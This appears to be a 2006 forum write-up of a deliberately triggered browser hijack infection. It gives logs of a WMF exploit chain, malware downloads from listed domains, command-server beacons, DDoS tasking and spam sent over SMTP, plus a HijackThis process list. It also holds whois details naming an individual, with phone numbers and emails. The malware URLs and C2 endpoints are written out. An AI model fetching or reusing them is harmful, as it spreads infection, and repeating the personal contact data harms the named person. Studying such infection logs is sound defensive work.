=========================================
Pragma Hijacks
=========================================

:: A few details of the hijack that has been spreading ::

http://www.antionline.com/history/topic.php/272882-1.html
http://www.webhostingtalk.com/showthread.php?t=493954
http://www.antionline.com/history/topic.php/272893-1.html

==============
:: LOGS ::
==============

Do not follow any of the links posted here unless it's time to buy a new computer and you feel like destroying the one you have ..

I went over the initial hijack site a few times to try and get as much of the files as possible .. so I found that each time I got hijacked was a little different.

I used Outpost Pro , Regrun and ProcessGuard for protection , which allowed me to maintain a controlled environment for the most part.

The last run was the full on take over of my pc as I decided to turn off Processguard , then suffered a system meltdown shortly after this as the hijacks werent fully taking until, I let them have access to physical memory. Then they went crazy.. Also set Outpost to disable mode to log everything but not block.

Once the system crashed and rebooted it was all over for me.. had the nt authority shutdown warning [ easily stopped by shutdown -a ] , and system freezes , by the end of it system was so slow it took 2hrs just to get hijack this to scan and save the log..


Finally in the end I rebooted once more , removed all registry auto run hijacks with Regrun , Outpost to block all network access and set ProcessGuard to block everthing that prompted to execute and began to clean up the mess.





==============





That link goes to :

HYPOTECHES.COM




* LegalTrademarks : PSGuard is a trademark of SHUDDER GLOBAL LIMITED


======================================

infectedkernel.com = 203.129.86.19

.www.euroiframe.com
.www.game4user.net
.www.iframestat.net
.www.infectedkernel.com
.www.spywaresoftstop.com
.www.violentcooperation.net

203.129.86.19
203.129.64.0 - 203.129.95.255
Hutchison Global Crossing Ltd.
Huchison GlobalCenter
Hong Kong
INFECTEDKERNEL.COM





-------------------------------------------

safe link - ripe db browser page - http://amsoft.ru/cgi-bin/ripn?q=DEN-MNT-RIPN

Пользователь: DENIS J GLEDENOV
ID: dengroup
E-Mail: den@den.ru
ICQ UIN: 677827
Статус: Пользователь
nic-hdl: DJG-RIPN
address: Moscow
phone: +7 095 7987060
fax-no: +7 095 7987060
e-mail: den@den.ru
e-mail: den@gledenov.ru
e-mail: den@ve.nu




http://www.mosnews.com/feature/2004/04/15/google.shtml

==============

:: Icesword Port Monitor ::




Short list of domains I pulled from the logs so far :

4:44:08 AM game4all.biz 217.107.217.184
4:45:39 AM evko.biz 66.235.180.23
4:45:48 AM buhartes.info 216.255.187.66
4:47:07 AM magik888.ru 85.249.23.82
4:55:38 AM asdbiz.biz 85.255.117.154
5:01:51 AM .www.maxysearch.info 69.50.179.158
5:01:56 AM user5323232323235.com 206.51.226.211
5:05:36 AM maxysearch.info 69.50.179.158
5:05:44 AM .www.burgostar.info 64.62.243.55
5:07:36 AM z0rder.com 80.77.80.145
5:15:47 AM pornsearch.megabest.info 80.77.80.145
5:16:16 AM .www.ya.ru 213.180.204.8
5:16:54 AM .www.z0rder.com 80.77.80.145
5:16:59 AM bloknotik.ru 81.177.11.174
5:18:31 AM images.bloknotik.ru 81.177.10.240

--------------------------------------------------------------------------

Some of the times may be a bit out of order , I tried to group together the same files / or links , but for the most part its in sequence. I removed a ton of duplicates so there will be some gaps in the times..

--------------------------------------------------------------------------

1st run :

3/12/2006 10:01:49 AM Internet Explorer http ://www.pragma.ru/~dch/inc/ 217.107.14.39 URL
3/12/2006 10:01:50 AM Internet Explorer GET /adv/083/new.php game4all.biz REQUEST
3/12/2006 10:01:50 AM Internet Explorer Moved Temporarily 217.107.14.39 ANSWER - 302
3/12/2006 10:01:50 AM Internet Explorer http ://game4all.biz/adv/083/new.php game4all.biz URL
3/12/2006 10:01:57 AM Internet Explorer OK game4all.biz ANSWER - 200
3/12/2006 10:01:58 AM Internet Explorer GET /adv/083/xpl.wmf game4all.biz REQUEST
3/12/2006 10:01:58 AM Internet Explorer http ://game4all.biz/adv/083/xpl.wmf game4all.biz URL
3/12/2006 10:01:58 AM Internet Explorer OK game4all.biz ANSWER - 200
3/12/2006 10:01:59 AM Internet Explorer GET /adv/083/sploit.anr game4all.biz REQUEST
3/12/2006 10:01:59 AM Internet Explorer http ://game4all.biz/adv/083/sploit.anr game4all.biz URL
3/12/2006 10:01:59 AM Internet Explorer OK game4all.biz ANSWER - 200
3/12/2006 10:02:01 AM Internet Explorer GET /adv/083/win32.exe game4all.biz REQUEST
3/12/2006 10:02:01 AM Internet Explorer http ://game4all.biz/adv/083/win32.exe game4all.biz URL
3/12/2006 10:02:01 AM Internet Explorer OK game4all.biz ANSWER - 200
3/12/2006 10:02:02 AM Internet Explorer http ://game4all.biz/adv/083/count.jar game4all.biz URL
3/12/2006 10:02:02 AM Internet Explorer OK game4all.biz ANSWER - 200
3/12/2006 10:02:02 AM Internet Explorer GET /adv/083/count.jar game4all.biz REQUEST
3/12/2006 10:02:05 AM Internet Explorer http ://game4all.biz/adv/083/win32.exe game4all.biz URL
3/12/2006 10:02:05 AM Internet Explorer GET /adv/083/win32.exe game4all.biz REQUEST
3/12/2006 10:02:06 AM Internet Explorer OK game4all.biz ANSWER - 200


202.62.226.199
81.164.37.214
80.54.187.183
68.148.208.246
69.76.227.23
64.71.167.44
69.235.55.171
200.176.111.73
64.71.167.44
217.210.252.200
83.144.106.67
193.16.239.13
61.246.253.193
88.105.165.171
69.73.103.192
216.255.179.235 - taskdir.exe - controller
81.177.3.175






64.71.167.18 - vxgame*.exe
69.50.173.166
69.50.171.172
69.50.161.106 - taskdir
69.50.184.194
69.50.179.158
.burgostar.info
.www.maxysearch.info
.www.reka-traffa.com
-

pornsearch.megabest.info
ya.ru
bloknotik.ru
images.bloknotik.info

-------------------------------------

193.16.239.13
193.16.239.0 - 193.16.239.255

VIRTUAL-NET S.C. A. KEPISTY, D. TERLECKI
Poland
Dariusz Terlecki
Virtual-Net s.c.
ul. Manifestu Lipcowego 9
25-323 Kielce
Poland


--------------------------------------------------------------------------------

:: Log details from when I got taken over ::

--------------------------------------------------------------------------------

3/12/2006 10:03:00 AM Slx.exe�������������������t GET /adv/083/adload.php?a1=United%20States&a2=Type%20of%20Processor:%20PENTIUM%20PRO%20or%20PENTIUM%20II/III&a3=Windows%20version%20is%205.1&a4=Build:%202600,%20Platform%20ID:%202&a5=notoutpost&table=adv83 game4all.biz REQUEST

3/12/2006 10:03:00 AM Slx.exe�������������������t http ://game4all.biz/adv/083/adload.php?a1=United%20States&a2=Type%20of%20Processor:%20PENTIUM%20PRO%20or%20PENTIUM%20II/III&a3=Windows%20version%20is%205.1&a4=Build:%202600,%20Platform%20ID:%202&a5=notoutpost&table=adv83 game4all.biz URL

3/12/2006 10:03:06 AM Lo-1378308035.exe GET /adv/083/adload.php?a1=United%20States&a2=Type%20of%20Processor:%20PENTIUM%20PRO%20or%20PENTIUM%20II/III&a3=Windows%20version%20is%205.1&a4=Build:%202600,%20Platform%20ID:%202&a5=outpost.exe&table=adv83 game4all.biz REQUEST
3/12/2006 10:03:06 AM Lo-1378308035.exe http ://game4all.biz/adv/083/adload.php?a1=United%20States&a2=Type%20of%20Processor:%20PENTIUM%20PRO%20or%20PENTIUM%20II/III&a3=Windows%20version%20is%205.1&a4=Build:%202600,%20Platform%20ID:%202&a5=outpost.exe&table=adv83 game4all.biz URL
3/12/2006 10:03:07 AM Slx.exe�������������������t OK game4all.biz ANSWER - 200
3/12/2006 10:03:00 AM Slx.exe�������������������t GET /adv/083/adload.php?a1=United%20States&a2=Type%20of%20Processor:%20PENTIUM%20PRO%20or%20PENTIUM%20II/III&a3=Windows%20version%20is%205.1&a4=Build:%202600,%20Platform%20ID:%202&a5=notoutpost&table=adv83 game4all.biz REQUEST
3/12/2006 10:03:00 AM Slx.exe�������������������t http ://game4all.biz/adv/083/adload.php?a1=United%20States&a2=Type%20of%20Processor:%20PENTIUM%20PRO%20or%20PENTIUM%20II/III&a3=Windows%20version%20is%205.1&a4=Build:%202600,%20Platform%20ID:%202&a5=notoutpost&table=adv83 game4all.biz URL
3/12/2006 10:03:06 AM Lo-1378308035.exe GET /adv/083/adload.php?a1=United%20States&a2=Type%20of%20Processor:%20PENTIUM%20PRO%20or%20PENTIUM%20II/III&a3=Windows%20version%20is%205.1&a4=Build:%202600,%20Platform%20ID:%202&a5=outpost.exe&table=adv83 game4all.biz REQUEST
3/12/2006 10:03:06 AM Lo-1378308035.exe http ://game4all.biz/adv/083/adload.php?a1=United%20States&a2=Type%20of%20Processor:%20PENTIUM%20PRO%20or%20PENTIUM%20II/III&a3=Windows%20version%20is%205.1&a4=Build:%202600,%20Platform%20ID:%202&a5=outpost.exe&table=adv83 game4all.biz URL
3/12/2006 10:03:07 AM Slx.exe�������������������t OK game4all.biz ANSWER - 200

3/12/2006 10:07:16 AM Vxh8jkdq7.exe http ://game4all.biz/vxgame1/vxv.php game4all.biz URL
3/12/2006 10:07:16 AM Vxh8jkdq6.exe http ://game4all.biz/tool1/ztool1.exe game4all.biz URL
3/12/2006 10:07:23 AM Vxh8jkdq6.exe http ://game4all.biz/tool1/ztool2.exe game4all.biz URL
3/12/2006 10:07:24 AM Vxh8jkdq6.exe http ://game4all.biz/tool1/ztool3.exe game4all.biz URL
3/12/2006 10:07:28 AM Vxh8jkdq6.exe http ://game4all.biz/tool1/ztool4.exe game4all.biz URL
3/12/2006 10:07:28 AM Vxh8jkdq7.exe http ://game4all.biz/vxgame1/zgame1.exe game4all.biz URL
3/12/2006 10:07:29 AM Vxh8jkdq7.exe http ://game4all.biz/vxgame1/zgame2.exe game4all.biz URL
3/12/2006 10:07:33 AM Vxh8jkdq7.exe http ://game4all.biz/vxgame1/zgame3.exe game4all.biz URL
3/12/2006 10:07:34 AM Vxh8jkdq7.exe http ://game4all.biz/vxgame1/zgame4.exe game4all.biz URL
3/12/2006 10:07:36 AM Vxh8jkdq7.exe http ://game4all.biz/vxgame1/zgame5.exe game4all.biz URL
3/12/2006 10:07:37 AM T.inx http ://game4all.biz/adv/083/adload.php?a1=United%20States&a2=Type%20of%20Processor:%20PENTIUM%20PRO%20or%20PENTIUM%20II/III&a3=Windows%20version%20is%205.1&a4=Build:%202600,%20Platform%20ID:%202&a5=outpost.exe&table=adv83 game4all.biz URL
3/12/2006 10:09:21 AM Generic Host Process for Win32 Services http ://72.36.244.185/cgi-bin/50/in/counter.pl?id=4fc0805e 72.36.244.185 URL
3/12/2006 10:09:23 AM Generic Host Process for Win32 Services http ://72.36.244.185/50/nt1.jpg 72.36.244.185 URL
3/12/2006 10:09:45 AM Vxgamet2.exe http ://81.177.3.175/cntr.php?a=8130734&b=2363&c=1252&d=5 81.177.3.175 URL
3/12/2006 10:09:55 AM Vxgamet1.exe http ://evko.biz/dl.php?code1=HUQ0&code2=1808 evko.biz URL
3/12/2006 10:09:56 AM Vxgame3.exe http ://buhartes.info/affcgi/try.fcgi?20004 buhartes.info URL
3/12/2006 10:09:57 AM Vxgamet1.exe http ://magik888.ru/t10.exe magik888.ru URL
3/12/2006 10:09:59 AM Vxgamet1.exe http ://asdbiz.biz/qwerty.exe asdbiz.biz URL
3/12/2006 10:10:01 AM Vxgamet1.exe http ://evko.biz/soft/3.exe/ evko.biz URL
3/12/2006 10:10:19 AM Generic Host Process for Win32 Services http ://85.255.117.157/synctl/upd/white.txt 85.255.117.157 URL
3/12/2006 10:10:25 AM Services.exe http ://buhartes.info/gallery20004/xpsystem/rxs.ini.php buhartes.info URL
3/12/2006 10:10:26 AM Services.exe http ://buhartes.info/gallery20004/xpsystem/cmd/3.02.00.dll buhartes.info URL
3/12/2006 10:10:26 AM Services.exe http ://buhartes.info/gallery20004/xpsystem/dll.php?f=3.02.00.dll buhartes.info URL
3/12/2006 10:10:28 AM Services.exe http ://buhartes.info/mm.exe buhartes.info URL
3/12/2006 10:10:28 AM Vxgamet2.exe http ://81.177.3.175/cntr.php?a=8130734&b=2757:&c=16469&d=5 81.177.3.175 URL
3/12/2006 10:10:29 AM Qvxgamet2.exe http ://magik888.ru/ntraf11.dat magik888.ru URL
3/12/2006 10:10:30 AM Vxgamet1.exe http ://evko.biz/dl.php?code1=HNQC&code2=1108 evko.biz URL
3/12/2006 10:10:31 AM Vxgamet1.exe http ://magik888.ru/t10.exe magik888.ru URL
3/12/2006 10:10:39 AM Generic Host Process for Win32 Services http ://www.microsoft.com/ 207.46.225.60 URL
3/12/2006 10:10:45 AM Mm5.exe http ://wm.buhartes.info/cgi-bin5/repeaterm.fcgi?n=1&lastid=&rand=%202.55297031253576E-0002 buhartes.info URL
3/12/2006 10:10:45 AM Dmx3b.tmp http ://alfaportal.com/c/l/109.0.51WP2600 69.31.85.154 URL
3/12/2006 10:10:45 AM Qvxgamet2.exe http ://magik888.ru/ntraf11.dat magik888.ru URL
3/12/2006 10:11:06 AM Generic Host Process for Win32 Services http ://85.255.117.157/synctl/ping.pl?ip=192.168.13.132&port1=27935&id=1338015838&ver=0004&con=L&speed=1 85.255.117.157 URL
3/12/2006 10:11:07 AM Generic Host Process for Win32 Services http ://85.255.117.157/synctl/ping.pl?ip=192.168.13.132&port1=47379&id=1338015838&ver=0004&con=L&speed=1 85.255.117.157 URL
3/12/2006 10:11:09 AM Generic Host Process for Win32 Services http ://proxy4u.ws/index.php?IP=192.168.13.132&Port1=0&Port2=0&ID=4fc0805e&Ver=0050&con=&speed=1 61.152.108.11 URL
3/12/2006 10:11:14 AM Generic Host Process for Win32 Services http ://72.36.244.185/50/nt3.jpg 72.36.244.185 URL
3/12/2006 10:11:17 AM Generic Host Process for Win32 Services http ://infectedkernel.com/synctl/upd/upd.txt 203.129.86.19 URL
3/12/2006 10:11:22 AM Generic Host Process for Win32 Services http ://85.255.117.157/synctl/ping.pl?ip=192.168.13.132&port1=45318&id=1338015838&ver=0004&con=L&speed=3 85.255.117.157 URL
3/12/2006 10:11:23 AM Generic Host Process for Win32 Services http ://72.36.244.185/cgi-bin/50/out/counter.pl?id=4fc0805e 72.36.244.185 URL
3/12/2006 10:11:46 AM Windows NT Logon Application http ://jupitersatellites.biz/newbot88/access.php?rand=65065 jupitersatellites.biz URL
3/12/2006 10:11:47 AM Windows NT Logon Application http ://jupitersatellites.biz/newbot88/r.php?i=1&s=2000&o=0&c=13&v=61&h=0&l=140931&a=0&ip=&win=Pl_2|Major_5|Minor_1|Build_2600|CSDV_Service_Pack_1&un=4167512075&rand=77048 jupitersatellites.biz URL
3/12/2006 10:23:38 AM Windows NT Logon Application http ://jupitersatellites.biz/newbot88/access.php?rand=70810 jupitersatellites.biz URL
3/12/2006 10:23:38 AM Windows NT Logon Application http ://jupitersatellites.biz/newbot88/r.php?i=1&s=2000&o=12786660706&c=13&v=61&h=0&l=141643&a=111&ip=&win=Pl_2|Major_5|Minor_1|Build_2600|CSDV_Service_Pack_1&un=4167512075&rand=55750 jupitersatellites.biz URL
3/12/2006 10:24:16 AM Generic Host Process for Win32 Services http ://proxy4u.ws/index.php?IP=192.168.13.132&Port1=17048&Port2=54370&ID=4fc0805e&Ver=0050&con=L&speed=7 61.152.108.11 URL
3/12/2006 10:28:17 AM Generic Host Process for Win32 Services http ://85.255.117.157/synctl/upd/white.txt 85.255.117.157 URL
3/12/2006 10:28:26 AM Generic Host Process for Win32 Services http ://85.255.117.157/synctl/ping.pl?ip=192.168.13.132&port1=27935&id=1338015838&ver=0004&con=L&speed=5 85.255.117.157 URL
3/12/2006 10:28:26 AM Generic Host Process for Win32 Services http ://85.255.117.157/synctl/ping.pl?ip=192.168.13.132&port1=47379&id=1338015838&ver=0004&con=L&speed=5 85.255.117.157 URL
3/12/2006 10:28:26 AM Generic Host Process for Win32 Services http ://85.255.117.157/synctl/loader.pl 85.255.117.157 URL
3/12/2006 10:28:30 AM Generic Host Process for Win32 Services http ://85.255.117.157/synctl/upd/ddos.txt 85.255.117.157 URL
3/12/2006 10:28:31 AM Generic Host Process for Win32 Services http ://85.255.117.157/synctl/ping.pl?ip=192.168.13.132&port1=45318&id=1338015838&ver=0004&con=L&speed=5 85.255.117.157 URL
3/12/2006 10:33:39 AM Windows NT Logon Application http ://jupitersatellites.biz/newbot88/access.php?rand=20603 jupitersatellites.biz URL
3/12/2006 10:33:39 AM Windows NT Logon Application http ://jupitersatellites.biz/newbot88/r.php?i=1&s=2000&o=12786660706&c=13&v=61&h=0&l=142244&a=24&ip=&win=Pl_2|Major_5|Minor_1|Build_2600|CSDV_Service_Pack_1&un=4167512075&rand=68108 jupitersatellites.biz URL
3/12/2006 10:34:20 AM Generic Host Process for Win32 Services http ://proxy4u.ws/index.php?IP=192.168.13.132&Port1=17048&Port2=54370&ID=4fc0805e&Ver=0050&con=L&speed=5 61.152.108.11 URL
3/12/2006 10:42:59 AM Generic Host Process for Win32 Services http ://85.255.117.157/synctl/ping.pl?ip=192.168.13.132&port1=45318&id=1338015838&ver=0004&con=L&speed=5 85.255.117.157 URL
3/12/2006 10:43:00 AM Generic Host Process for Win32 Services http ://85.255.117.157/synctl/ping.pl?ip=192.168.13.132&port1=47379&id=1338015838&ver=0004&con=L&speed=7 85.255.117.157 URL
3/12/2006 10:43:00 AM Generic Host Process for Win32 Services http ://85.255.117.157/synctl/ping.pl?ip=192.168.13.132&port1=27935&id=1338015838&ver=0004&con=L&speed=5 85.255.117.157 URL
3/12/2006 10:43:03 AM Generic Host Process for Win32 Services http ://85.255.117.157/synctl/upd/ddos.txt 85.255.117.157 URL
3/12/2006 10:44:32 AM Generic Host Process for Win32 Services http ://proxy4u.ws/index.php?IP=192.168.13.132&Port1=17048&Port2=54370&ID=4fc0805e&Ver=0050&con=L&speed=5 61.152.108.11 URL
3/12/2006 10:54:42 AM Generic Host Process for Win32 Services http ://proxy4u.ws/index.php?IP=192.168.13.132&Port1=17048&Port2=54370&ID=4fc0805e&Ver=0050&con=L&speed=7 61.152.108.11 URL
3/12/2006 10:57:19 AM Generic Host Process for Win32 Services http ://85.255.117.157/synctl/ping.pl?ip=192.168.13.132&port1=47379&id=1338015838&ver=0004&con=L&speed=7 85.255.117.157 URL
3/12/2006 11:07:20 AM Windows Explorer http ://asdbiz.biz/soft/softadmin.php?action=get_update&ver=v0.005&id={BB7CB5AC-1F58-4A6F-8A1A-32C7453330FB} asdbiz.biz URL
3/12/2006 11:07:20 AM Windows Explorer http ://asdbiz.biz/soft/softadmin.php?action=register&ver=v0.005&id={BB7CB5AC-1F58-4A6F-8A1A-32C7453330FB} asdbiz.biz URL
3/12/2006 11:07:21 AM Windows Explorer http ://z0rder.com/ssoft/softadmin.php?action=register&ver=v0.005&id={BB7CB5AC-1F58-4A6F-8A1A-32C7453330FB} z0rder.com URL
3/12/2006 11:07:21 AM Windows Explorer http ://asdbiz.biz/soft/softadmin.php?action=get_2execute&ver=v0.005&id={BB7CB5AC-1F58-4A6F-8A1A-32C7453330FB} asdbiz.biz URL
3/12/2006 11:07:26 AM Windows Explorer http ://www.google.com/?q=Áèëàéí www.google.com URL
3/12/2006 11:10:08 AM Generic Host Process for Win32 Services http ://proxy4u.ws:8080/update2.htm 61.152.108.11 URL
3/12/2006 11:10:14 AM Generic Host Process for Win32 Services http ://infectedkernel.com/synctl/upd/upd.txt 203.129.86.19 URL
3/12/2006 11:12:18 AM Generic Host Process for Win32 Services http ://85.255.117.157/synctl/ping.pl?ip=192.168.13.132&port1=47379&id=1338015838&ver=0004&con=L&speed=4 85.255.117.157 URL
3/12/2006 11:12:19 AM Generic Host Process for Win32 Services http ://85.255.117.157/synctl/ping.pl?ip=192.168.13.132&port1=27935&id=1338015838&ver=0004&con=L&speed=4 85.255.117.157 URL
3/12/2006 11:15:41 AM Generic Host Process for Win32 Services http ://proxy4u.ws/index.php?IP=192.168.13.132&Port1=17048&Port2=54370&ID=4fc0805e&Ver=0050&con=L&speed=5 61.152.108.11 URL
3/12/2006 12:33:08 PM Internet Explorer http ://pornsearch.megabest.info/search.php?q=anal+toys&mode=1 z0rder.com URL - LOL I didnt search for that !!!


==========================

Fully taken over I was sending out a lot of traffic ... blocked by host firewall

===========================

:: DNS CACHE SPAMBOT LOG ::

===========================

10:01:49 AM www.pragma.ru 217.107.14.39
10:01:50 AM game4all.biz 217.107.217.184
10:09:37 AM update.windows-center.net 216.195.47.194
10:09:53 AM evko.biz 66.235.180.23
10:09:55 AM buhartes.info 216.255.187.66
10:09:57 AM magik888.ru 85.249.23.82
10:10:45 AM alfaportal.com 69.31.85.154
10:10:45 AM wm.buhartes.info 216.255.187.66
10:10:46 AM mx4.mail.yahoo.com 66.218.86.156, 66.218.86.253, 66.218.86.254
10:10:46 AM mx1.hotmail.com 65.54.244.136, 65.54.245.8, 64.4.50.50, 65.54.244.8
10:10:47 AM mx1.mail.yahoo.com 67.28.113.11, 67.28.113.71, 4.79.181.14, 4.79.181.15
10:10:48 AM mx3.hotmail.com 65.54.244.72, 65.54.244.200, 65.54.245.72, 64.4.50.179
10:10:49 AM mx4.hotmail.com 65.54.190.179, 65.54.244.104, 65.54.244.232, 65.54.245.104
10:10:49 AM mx.central.cox.net 70.168.47.164
10:10:51 AM sbcmx4.prodigy.net 207.115.57.18
10:10:53 AM mx2.hotmail.com 65.54.245.40, 65.54.190.50, 65.54.244.40, 65.54.244.168
10:10:53 AM mx2.mail.yahoo.com 67.28.113.70, 4.79.181.134, 4.79.181.135, 67.28.113.19
10:10:53 AM mprdmxin.myway.com 208.45.133.151
10:10:54 AM mail.telia.com 81.228.11.160, 81.228.8.84, 81.228.8.85, 81.228.8.165, 81.228.11.99, 81.228.11.100
10:10:59 AM mx3.mail.yahoo.com 67.28.113.10, 4.79.181.12, 4.79.181.13, 64.156.215.8, 64.156.215.18
10:11:00 AM xmxpita.excite.com 208.45.133.107
10:11:00 AM sbcmx1.prodigy.net 207.115.57.15
10:11:00 AM mailin-03.mx.aol.com 64.12.138.120, 205.188.157.217, 205.188.159.57, 64.12.138.57
10:11:00 AM mail-com.mr.outblaze.com 64.71.166.199, 205.158.62.33, 208.36.123.68, 64.71.166.194, 64.71.166.196, 64.71.166.197
10:11:01 AM mailin-01.mx.aol.com 64.12.137.249, 205.188.156.185, 205.188.158.121
10:11:01 AM gateway-r.comcast.net 216.148.227.126, 204.127.198.26
10:11:01 AM mailin-04.mx.aol.com 205.188.159.217, 64.12.138.89, 64.12.138.152, 205.188.156.249
10:11:02 AM mail.optusnet.com.au 211.29.132.250
10:11:04 AM mailin-01.mx.netscape.net 205.188.158.25
10:11:05 AM mx00.mail.bellsouth.net 205.152.58.32
10:11:05 AM corderoatado.arnet.com.ar 200.45.191.163
10:11:05 AM mxs.mail.ru 194.67.23.20
10:11:05 AM blackplanet-com-bk.mr.outblaze.com 208.36.123.58, 64.71.166.195, 64.71.166.198, 64.71.166.202
10:11:06 AM smtp.wanadoo.fr 193.252.22.83, 193.252.22.89, 193.252.22.92, 193.252.22.107, 193.252.22.110, 193.252.22.116, 193.252.22.123, 193.252.23.67, 193.252.23.110, 193.252.22.56, 193.252.22.65, 193.252.22.78, 193.252.22.79, 193.252.22.80, 193.252.22.81, 193.252.22.82
10:11:06 AM mailin01.sul.t-online.de 194.25.134.72
10:11:07 AM mx.organizer.net 194.24.253.71
10:11:08 AM mx.frontiernet.net 66.133.129.70
10:11:08 AM dialmaine.com.mail1.psmtp.com 64.18.4.10
10:11:09 AM smtp1.inicia.es 212.166.64.67
10:11:09 AM mx.noos.fr 194.117.218.78
10:11:09 AM proxy4u.ws 61.152.108.11
10:11:10 AM mx2.mail.ukl.yahoo.com 217.12.11.64
10:11:11 AM mx00.schlund.de 212.227.15.134, 212.227.15.150, 212.227.15.169, 212.227.15.186
10:11:12 AM mail2.e-mail.dk 212.112.128.249
10:11:12 AM mailin.rzone.de 81.169.145.100
10:11:14 AM mail.citykom.de 195.202.32.24, 195.202.32.22
10:11:14 AM hrndva-02.mgw.rr.com 24.28.204.36, 24.28.204.37, 24.28.204.27, 24.28.204.28, 24.28.204.29, 24.28.204.30, 24.28.204.35
10:11:14 AM mx0.gmx.net 213.165.64.100
10:11:15 AM mx-ha01.web.de 217.72.192.149
10:11:15 AM infectedkernel.com 203.129.86.19
10:11:17 AM bender.weihenstephan.org 62.245.246.226
10:11:18 AM nullmx.mns.com 127.0.0.1
10:11:18 AM sbcmx3.prodigy.net 207.115.57.17
10:11:19 AM mailin00.sul.t-online.de 194.25.134.8
10:11:21 AM mx3.earthlink.net 209.86.93.228
10:11:22 AM leeds.sin1.netline.net.uk 213.40.2.10, 213.40.2.11, 213.40.2.12
10:11:22 AM mailin02.sul.t-online.de 194.25.134.9
10:11:22 AM mx5.mail.yahoo.co.jp 202.93.83.236


=============================================


3/12/2006 2:14:30 PM svchost.exe IN TCP 216.195.47.194 2506 Allow All Activity
3/12/2006 2:08:10 PM winlogon.exe OUT TCP jupitersatellites.biz http Undefined Rule
3/12/2006 2:08:10 PM winlogon.exe OUT UDP localhost 1025 Undefined Rule
3/12/2006 11:41:08 AM svchost.exe OUT TCP 85.255.117.157 http Allow All Activity
3/12/2006 11:40:59 AM svchost.exe OUT TCP 207.46.20.60 http Allow All Activity
3/12/2006 11:36:10 AM svchost.exe OUT TCP 61.152.108.11 http Allow All Activity
3/12/2006 11:25:48 AM svchost.exe OUT TCP 207.46.199.30 http Allow All Activity
3/12/2006 11:21:31 AM svchost.exe OUT TCP 216.195.47.194 smtp Allow All Activity
3/12/2006 11:11:00 AM svchost.exe OUT TCP 203.129.86.19 http Allow All Activity
3/12/2006 11:10:52 AM svchost.exe OUT TCP 216.35.187.247 proxy:8080 Allow All Activity
3/12/2006 11:10:29 AM svchost.exe OUT TCP 61.152.108.11 proxy:8080 Allow All Activity
3/12/2006 11:09:24 AM svchost.exe OUT TCP 216.195.47.194 smtp Allow All Activity
3/12/2006 11:04:44 AM svchost.exe OUT TCP 207.46.199.60 http Allow All Activity
3/12/2006 10:57:15 AM svchost.exe OUT TCP 207.46.199.30 http Allow All Activity
3/12/2006 10:11:23 AM svchost.exe OUT TCP 72.36.244.185 http Disable Mode
3/12/2006 10:11:15 AM svchost.exe OUT TCP 207.46.20.30 http Disable Mode
3/12/2006 11:07:26 AM explorer.exe OUT TCP z0rder.com http Allow All Activity
3/12/2006 11:07:20 AM explorer.exe OUT TCP asdbiz.biz http Allow All Activity
3/12/2006 10:33:39 AM winlogon.exe OUT TCP jupitersatellites.biz http Disable Mode
3/12/2006 10:11:23 AM mm5.exe OUT TCP 213.40.2.10 smtp Disable Mode
3/12/2006 10:11:23 AM mm5.exe OUT TCP 205.188.159.217 smtp Disable Mode
3/12/2006 10:11:22 AM mm5.exe OUT TCP 216.148.227.126 smtp Disable Mode
3/12/2006 10:11:22 AM mm5.exe OUT TCP 67.28.113.70 smtp Disable Mode
3/12/2006 10:11:22 AM mm5.exe OUT UDP 192.168.13.2 dns Disable Mode
3/12/2006 10:11:22 AM mm5.exe OUT TCP 65.54.245.40 smtp Disable Mode
3/12/2006 10:11:22 AM mm5.exe OUT TCP 67.28.113.70 smtp Disable Mode
3/12/2006 10:11:22 AM mm5.exe OUT TCP 194.25.134.9 smtp Disable Mode
3/12/2006 10:11:22 AM mm5.exe OUT TCP 202.93.83.236 smtp Disable Mode
3/12/2006 10:11:21 AM mm5.exe OUT TCP 65.54.244.72 smtp Disable Mode
3/12/2006 10:11:21 AM mm5.exe OUT TCP 67.28.113.10 smtp Disable Mode
3/12/2006 10:11:21 AM mm5.exe OUT TCP 209.86.93.228 smtp Disable Mo
3/12/2006 10:11:19 AM mm5.exe OUT TCP 194.25.134.8 smtp Disable Mode
3/12/2006 10:11:18 AM mm5.exe OUT TCP 213.165.64.100 smtp Disable Mode
3/12/2006 10:11:18 AM mm5.exe OUT TCP 62.245.246.226 smtp Disable Mode
3/12/2006 10:11:18 AM mm5.exe OUT UDP 192.168.13.2 dns Disable Mode
3/12/2006 10:11:18 AM mm5.exe OUT UDP 192.168.13.2 dns Disable Mode
3/12/2006 10:11:18 AM mm5.exe OUT TCP 213.165.64.100 smtp Disable Mode
3/12/2006 10:11:18 AM mm5.exe OUT TCP 207.115.57.17 smtp Disable Mode
3/12/2006 10:11:18 AM mm5.exe OUT UDP 192.168.13.2 dns Disable Mode
3/12/2006 10:11:15 AM mm5.exe OUT TCP 217.72.192.149 smtp Disable Mode


lots more where that came from .. let it run for almost 20 hrs

=================== end of transmission- I had enough posting =========================


temp.wsf:




==============
:: Hijack this log ::
==============

Cleaned out most normal programs to just show main hijacks

Logfile of HijackThis v1.99.1
Scan saved at 10:19:57 PM, on 3/12/2006
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe -< was hijacked
C:\WINDOWS\system32\services.exe -< was hijacked
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe -< was hijacked
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE -< was hijacked
C:\Program Files\AlfaCleaner\AlfaCleaner.exe
C:\Program Files\AlfaCleaner\ACServer.exe
C:\WINDOWS\System32\kernels8.exe
C:\WINDOWS\System32\intell321.exe
C:\WINDOWS\System32\kernels8.exe
C:\WINDOWS\System32\vxgamet2.exe
C:\WINDOWS\System32\vxgamet4.exe
C:\WINDOWS\System32\maxd64.exe
C:\Program Files\AlfaCleaner\AlfaCleaner.exe
C:\WINDOWS\System32\vxh8jkdq2.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\maxd64.exe
C:\WINDOWS\System32\maxd64.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\maxd64.exe
C:\WINDOWS\System32\maxd64.exe
C:\WINDOWS\System32\maxd64.exe
C:\WINDOWS\System32\maxd64.exe
C:\WINDOWS\System32\maxd64.exe
C:\WINDOWS\System32\maxd64.exe
C:\WINDOWS\System32\maxd64.exe
C:\WINDOWS\System32\maxd64.exe
C:\WINDOWS\System32\maxd64.exe
C:\WINDOWS\System32\maxd64.exe
C:\WINDOWS\System32\maxd64.exe
C:\WINDOWS\System32\maxd64.exe
C:\WINDOWS\System32\maxd64.exe
